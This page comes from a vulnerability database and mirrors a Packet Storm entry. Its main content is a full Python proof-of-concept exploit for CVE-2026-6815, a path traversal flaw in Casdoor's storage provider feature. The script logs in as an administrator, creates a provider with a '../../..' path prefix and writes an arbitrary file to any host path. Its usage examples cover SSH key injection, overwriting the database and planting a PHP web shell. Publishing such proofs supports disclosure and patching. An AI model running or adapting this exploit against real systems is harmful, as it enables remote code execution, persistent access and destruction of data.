Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Casdoor 3.54.1 Arbitrary File Write / Path Traversal

🗓️ 29 May 2026 00:00:00Reported by sixpainType 
packetstorm
 packetstorm🔗 packetstorm.news👁 45 Views

Casdoor 3.54.1 path traversal allows arbitrary file writes by admins, enabling RCE or DoS.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Path Traversal in Casbin Casdoor
4 Jun 202615:06
githubexploit
Circl		CVE-2026-6815
4 Jun 202615:07
circl
CNNVD		Casdoor 安全漏洞
11 May 202600:00
cnnvd
CVE		CVE-2026-6815
11 May 202615:20
cve
Cvelist		CVE-2026-6815 CVE-2026-6815
11 May 202615:20
cvelist
Exploit DB		Casdoor 3.54.1 - Arbitrary File Write via Path Traversal
27 May 202600:00
exploitdb
EUVD		EUVD-2026-29080
11 May 202618:31
euvd
NVD		CVE-2026-6815
11 May 202616:17
nvd
Packet Storm		📄 Casdoor 3.54.1 Path Traversal / Arbitrary File Write
16 Jun 202600:00
packetstorm
Packet Storm		📄 Casdoor 3.54.1 Arbitrary File Write / Shell Upload
16 Jun 202600:00
packetstorm
Rows per page
# Exploit Title: Casdoor 3.54.1 - Arbitrary File Write via Path Traversal 
    # Date: 2026-05-11
    # Exploit Author: sixpain
    # Vendor Homepage: https://casdoor.org/
    # Software Link: https://github.com/casdoor/casdoor
    # Version: < 3.54.1
    # Tested on: Linux / Docker
    # CVE : CVE-2026-6815
    
    """
    Casdoor Arbitrary File Write / Path Traversal PoC (CVE-2026-6815)
    ================================================
    
    DESCRIPTION:
    This script exploits a Path Traversal vulnerability in the storage provider 
    management component of Casdoor. By creating a 'Local File System' provider 
    with a manipulated 'pathPrefix', an authenticated administrator can bypass 
    the storage sandbox to write, overwrite, or delete arbitrary files on the 
    underlying host filesystem.
    
    IMPACT:
    - Remote Code Execution (RCE) via SSH key injection or web shell upload.
    - Persistent Denial of Service (DoS) by corrupting core application binaries 
      or database files (e.g., casdoor.db).
    
    USAGE EXAMPLES:
    1. SSH Key Injection for RCE:
       python3 poc.py --url http://target:8000 --usr admin --psw 123 --file id_rsa.pub --rpath /home/casdoor/.ssh/authorized_keys
    
    2. Persistent DoS (Database Corruption):
       python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db
    
    3. Reverse Shell (via secondary web server webroot):
       python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php
    
    TROUBLESHOOTING & TECHNICAL NOTES:
    - APP & ORG CONTEXT: By default, the script targets the 'app-built-in' application 
      and 'built-in' organization. If you have credentials for custom 
      namespaces, specify them using the --appname and --orgname flags.
    - FILE OVERWRITE BEHAVIOR: Successful overwriting occurs only once per unique 
      remote path. Casdoor's resource management logic prevents direct subsequent 
      overwrites by appending increments (e.g., file-1.ext, file-2.ext) to the 
      resource name if the entry already exists in the application's internal 
      database. To re-exploit the same path, the specific resource entry must 
      usually be deleted via the UI/API or a different provider name must be used.
    - PERMISSIONS: Exploitation success is dependent on the OS-level permissions 
      of the user account running the Casdoor service.
    - VERBOSE MODE: Use -v or --verbose to inspect raw API requests and responses.
    
    DISCLAIMER:
    This tool is for educational and coordinated disclosure purposes only. 
    Unauthorized testing against systems you do not own is illegal.
    """
    
    
    import argparse
    import requests
    import json
    import os
    
    def log_request(response, verbose):
        """Prints request and response details if verbose mode is enabled."""
        if verbose:
            print("\n" + "="*50)
            print(f"DEBUG - REQUEST: {response.request.method} {response.request.url}")
            print(f"HEADERS: {json.dumps(dict(response.request.headers), indent=2)}")
            if response.request.body:
                # Handle potential bytes body for multipart
                body = response.request.body
                if isinstance(body, bytes):
                    print(f"BODY: <binary data, length {len(body)}>")
                else:
                    print(f"BODY: {body}")
            print("-" * 50)
            print(f"DEBUG - RESPONSE: {response.status_code}")
            print(f"HEADERS: {json.dumps(dict(response.headers), indent=2)}")
            try:
                print(f"JSON BODY: {json.dumps(response.json(), indent=2)}")
            except:
                print(f"RAW BODY: {response.text[:500]}...") 
            print("="*50 + "\n")
    
    def run_poc():
        parser = argparse.ArgumentParser(description="Casdoor Path Traversal Exploitation PoC")
        parser.add_argument("--url", required=True, help="Target base URL (e.g., http://casdoor:8000)")
        parser.add_argument("--usr", default="admin", help="Login username")
        parser.add_argument("--psw", default="123", help="Login password")
        parser.add_argument("--file", required=True, help="Local file to upload")
        parser.add_argument("--rpath", required=True, help="Absolute remote path (e.g., /tmp/pwned.txt)")
        parser.add_argument("--appname", default='app-built-in', help="Target Casdoor Application Name")
        parser.add_argument("--orgname", default='built-in', help="Target Casdoor Organization Name")
        parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
        
        args = parser.parse_args()
        
        # Sanitize and validate URL schema
        target_url = args.url.strip().rstrip('/')
        if not target_url.startswith(('http://', 'https://')):
            print("[!] No protocol specified. Defaulting to http://")
            target_url = f"http://{target_url}"
        
        session = requests.Session()
    
        # Setting common user agent
        session.headers.update({
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
        })
    
        # --- STEP 1: INITIAL SESSION ---
        print(f"[*] Step 1: Retrieving initial session cookie...")
        try:
            r1 = session.get(f"{target_url}/login/built-in")
            log_request(r1, args.verbose)
            
            if "casdoor_session_id" not in session.cookies:
                print("[-] Error: Failed to retrieve casdoor_session_id.")
                return
            print(f"[+] Session ID obtained: {session.cookies.get('casdoor_session_id')}")
    
            # --- STEP 2: LOGIN / PRIVILEGE ESCALATION ---
            print(f"[*] Step 2: Logging in as {args.usr}...")
            login_payload = {
                "application": args.appname,
                "organization": args.orgname,
                "username": args.usr,
                "password": args.psw,
                "autoSignin": True,
                "signinMethod": "Password",
                "type": "login"
            }
            
            r2 = session.post(
                f"{target_url}/api/login", 
                data=json.dumps(login_payload),
                headers={"Content-Type": "text/plain;charset=UTF-8"}
            )
            log_request(r2, args.verbose)
            
            login_res = r2.json()
            if login_res.get("status") == "ok" and 'admin' in login_res.get("data").lower():
                print("[+] Login successful. Admin privileges confirmed.")
            else:
                print("[!] Warning: Not an admin or login failed. Attempting to proceed anyway...")
    
            # --- STEP 2.5: VERSION CHECK ---
            print(f"[*] Step 2.5: Checking Casdoor version...")
            try:
                r_version = session.get(f"{target_url}/api/get-version-info")
                log_request(r_version, args.verbose)
                if r_version.status_code == 200:
                    version_data = r_version.json().get("data", {})
                    if not version_data:
                         # Some versions might return data directly or in different format
                         version_data = r_version.json()
                    
                    version = version_data.get("version", "unknown")
                    print(f"[+] Target Casdoor version: {version}")
                    
                    # Check if version is patched (>= 3.54.1)
                    is_vulnerable = True
                    if version != "unknown" and version != "dev":
                        try:
                            v_clean = version.lstrip('v').split('-')[0]
                            v_parts = [int(p) for p in v_clean.split('.')]
                            if v_parts >= [3, 54, 1]:
                                is_vulnerable = False
                        except:
                            pass # Parsing error, assume vulnerable or let user decide
                    
                    if not is_vulnerable:
                        print(f"[!] WARNING: Target version {version} is likely PATCHED (>= 3.54.1) and this PoC will not work.")
                        choice = input("[?] Do you want to continue anyway? (y/N): ").lower()
                        if choice != 'y':
                            print("[-] Aborting.")
                            return
                else:
                    print("[!] Warning: Could not retrieve version info (Status: {}).".format(r_version.status_code))
            except Exception as e:
                print(f"[!] Error during version check: {e}")
    
    
            # --- STEP 3: CREATE MALICIOUS STORAGE PROVIDER ---
            print("[*] Step 3: Creating Path Traversal Provider...")
            provider_payload = {
                "owner": "admin",
                "name": "path_traversal",
                "createdTime": "2026-02-20T17:59:58+01:00",
                "displayName": "Path Traversal Provider",
                "category": "Storage",
                "type": "Local File System",
                "method": "Normal",
                "pathPrefix": "../../../../../../../../../"
            }
            
            r3 = session.post(
                f"{target_url}/api/add-provider", 
                data=json.dumps(provider_payload),
                headers={"Content-Type": "text/plain;charset=UTF-8"}
            )
            log_request(r3, args.verbose)
            
            prov_res = r3.json()
            msg = prov_res.get("msg", "")
            if prov_res.get("status") == "ok":
                print("[+] Malicious provider created successfully.")
            elif "UNIQUE constraint failed" in msg:
                print("[*] Provider 'path_traversal' already exists. Reusing it.")
            else:
                print(f"[-] Failed to create provider: {msg}")
                if "pathPrefix" in msg and "is not allowed" in msg:
                    print(f"[!] Escape sequence is sanitized. Check Casdoor version < 3.54.1 (CVE-2026-6815 is likely fixed).")
                return
    
            # --- STEP 4: FILE UPLOAD (EXPLOITATION) ---
            print(f"[*] Step 4: Uploading {args.file} to {args.rpath}...")
            upload_params = {
                "owner": args.orgname,
                "user": args.usr,
                "application": args.appname,
                "tag": "custom",
                "parent": "ResourceListPage",
                "fullFilePath": args.rpath,
                "provider": "path_traversal"
            }
            
            if not os.path.exists(args.file):
                print(f"[-] Error: Local file {args.file} not found.")
                return
    
            with open(args.file, 'rb') as f:
                # Note: headers are handled automatically by requests for multipart/form-data
                files = {'file': (os.path.basename(args.file), f, 'application/octet-stream')}
                r4 = session.post(f"{target_url}/api/upload-resource", params=upload_params, files=files)
                log_request(r4, args.verbose)
                
                upload_res = r4.json()
    
            if upload_res.get("status") == "ok":
                print("\n" + "!"*25)
                print(" EXPLOIT SUCCESSFUL")
                print("!"*25 + "\n")
    
                print(f"Response Path")
                print(25*'-')
                print(f'\t-data : {upload_res.get('data')}')
                print(f'\t-data2: {upload_res.get('data2')}')
                print(f'\t-data3: {upload_res.get('data3')}')
                print(25*'-')
    
            else:
                    print(f"[-] Upload failed: {upload_res.get('msg')}")
    
        except Exception as e:
            print(f"[-] An unexpected error occurred: {e}")
    
    if __name__ == "__main__":
        run_poc()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 May 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.15.9
EPSS0.00513
SSVC
casdoorpath traversalarbitrary file writestorage providerlocal file systemauthenticated administratorremote code executiondenial of service
45